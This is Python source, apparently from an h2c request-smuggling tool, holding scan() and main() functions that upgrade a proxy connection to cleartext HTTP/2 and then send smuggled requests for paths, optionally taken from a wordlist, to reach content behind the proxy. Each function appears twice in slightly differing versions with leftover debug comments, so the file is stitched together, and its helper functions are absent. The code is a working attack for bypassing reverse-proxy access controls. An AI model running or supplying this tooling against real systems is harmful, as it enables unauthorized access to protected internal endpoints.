def scan(line):
connection = None
try:
proxy_url = urlparse(line)
if not line.startswith("http"):
print("[ERROR]: skipping invalid protocol: " + line)
return
connection = establish_tcp_connection(proxy_url)
h2_connection = h2.connection.H2Connection()
settings_header_value = h2_connection.initiate_upgrade_connection()
send_initial_request(connection, proxy_url,
settings_header_value)
_, success = get_upgrade_response(connection, proxy_url)
if not success:
return
print("[INFO] Success! " + line + " can be used for tunneling")
sys.stdout.flush()
except Exception as e:
print("[ERROR] " + e.__str__() + ": " + line, file=sys.stderr)
sys.stderr.flush()
finally:
if connection:
connection.shutdown(socket.SHUT_RDWR)
connection.close()
def scan(line):
connection = None
try:
proxy_url = urlparse(line)
connection = establish_tcp_connection(proxy_url, None)
h2_connection = h2.connection.H2Connection()
settings_header_value = h2_connection.initiate_upgrade_connection()
send_initial_request(connection, proxy_url,
settings_header_value, None)
get_upgrade_response(connection)
print("[INFO] Success! " + line + " can be used for tunneling")
sys.stdout.flush()
except Exception as e:
print("[ERROR] " + e.__str__() + ": " + line, file=sys.stderr)
sys.stderr.flush()
finally:
if connection:
connection.shutdown(socket.SHUT_RDWR)
connection.close()
def main(args):
"""
The client upgrade flow.
"""
proxy_url = urlparse(args.proxy)
# Step 1: Establish the TCP connecton.
connection = establish_tcp_connection(proxy_url)
# Step 2: Create H2 Connection object, put it in upgrade mode, and get the
# value of the HTTP2-Settings header we want to use.
h2_connection = h2.connection.H2Connection()
settings_header_value = h2_connection.initiate_upgrade_connection()
# Step 3: Send the initial HTTP/1.1 request with the upgrade fields.
send_initial_request(connection, proxy_url, settings_header_value)
# Step 4: Read the HTTP/1.1 response, look for 101 response.
extra_data = get_upgrade_response(connection)
print("[INFO] h2c stream established successfully.")
if args.test:
print("[INFO] Success! " + args.proxy + " can be used for tunneling")
sys.exit(0)
# Step 5: Immediately send the pending HTTP/2 data.
connection.sendall(h2_connection.data_to_send())
# Step 6: Feed the body data to the connection.
events = h2_connection.receive_data(extra_data)
# Step 7 Receive data and process
events = getData(h2_connection, connection)
connection.sendall(h2_connection.data_to_send())
handle_events(events, args.verbose)
# Craft request headers and grab next available stream id
if args.wordlist:
with open(args.wordlist) as fd:
urls = [urlparse(urljoin(args.url, url.strip()))
for url in fd.readlines()]
else:
urls = [urlparse(args.url)]
for url in urls:
path = url.path or "/"
smuggled_request_headers = [
(':method', args.request),
(':authority', url.hostname),
(':scheme', url.scheme),
(':path', path),
]
# Add user-defined headers
if args.header:
for header in args.header:
smuggled_request_headers.append(tuple(header.split(": ")))
# Send request
print("[INFO] Requesting - " + path)
sendSmuggledRequest(h2_connection,
connection,
smuggled_request_headers,
args)
# Terminate connection
h2_connection.close_connection()
connection.sendall(h2_connection.data_to_send())
connection.shutdown(socket.SHUT_RDWR)
connection.close()
def main(args):
"""
The client upgrade flow.
"""
if not args.proxy.startswith("http"):
print("[ERROR]: invalid protocol: " + args.proxy, file=sys.stderr)
sys.exit(1)
proxy_url = urlparse(args.proxy)
# Step 1: Establish the TCP connecton.
connection = establish_tcp_connection(proxy_url)
# Step 2: Create H2 Connection object, put it in upgrade mode, and get the
# value of the HTTP2-Settings header we want to use.
h2_connection = h2.connection.H2Connection()
settings_header_value = h2_connection.initiate_upgrade_connection()
# Step 3: Send the initial HTTP/1.1 request with the upgrade fields.
send_initial_request(connection, proxy_url, settings_header_value)
# Step 4: Read the HTTP/1.1 response, look for 101 response.
extra_data, success = get_upgrade_response(connection, proxy_url)
if not success:
sys.exit(1)
print("[INFO] h2c stream established successfully.")
if args.test:
print("[INFO] Success! " + args.proxy + " can be used for tunneling")
sys.exit(0)
import time
# time.sleep(2)
# Step 5: Immediately send the pending HTTP/2 data.
# This must send the http pri request that establishes http2
# also appears to send the initial get request again
d = h2_connection.data_to_send()
# print("data to send ", d)
connection.sendall(d)
# Step 6: Feed the body data to the connection.
events = h2_connection.receive_data(extra_data)
# Step 7 Receive data and process
events = getData(h2_connection, connection)
# We then have recieved the response
handle_events(events, [(), ('host', proxy_url.netloc), (),
('path', proxy_url.path)], args.verbose)
# This is an ack
d = h2_connection.data_to_send()
# print("data to send", d)
connection.sendall(d)
# Craft request headers and grab next available stream id
if args.wordlist:
with open(args.wordlist) as fd:
urls = [
urlparse(urljoin(args.url, url.strip()))
for url in fd.readlines()
]
else:
urls = [urlparse(args.url)]
import time
# time.sleep(5)
for url in urls:
path = url.path or "/"
smuggled_request_headers = [
(':method', args.request),
(':authority', url.hostname),
(':scheme', url.scheme),
(':path', path),
]
# Add user-defined headers
if args.header:
for header in args.header:
smuggled_request_headers.append(tuple(header.split(": ")))
# Send request
print("[INFO] Requesting - " + path)
sendSmuggledRequest(h2_connection, connection,
smuggled_request_headers, args)
# Terminate connection
h2_connection.close_connection()
connection.sendall(h2_connection.data_to_send())
connection.shutdown(socket.SHUT_RDWR)
connection.close()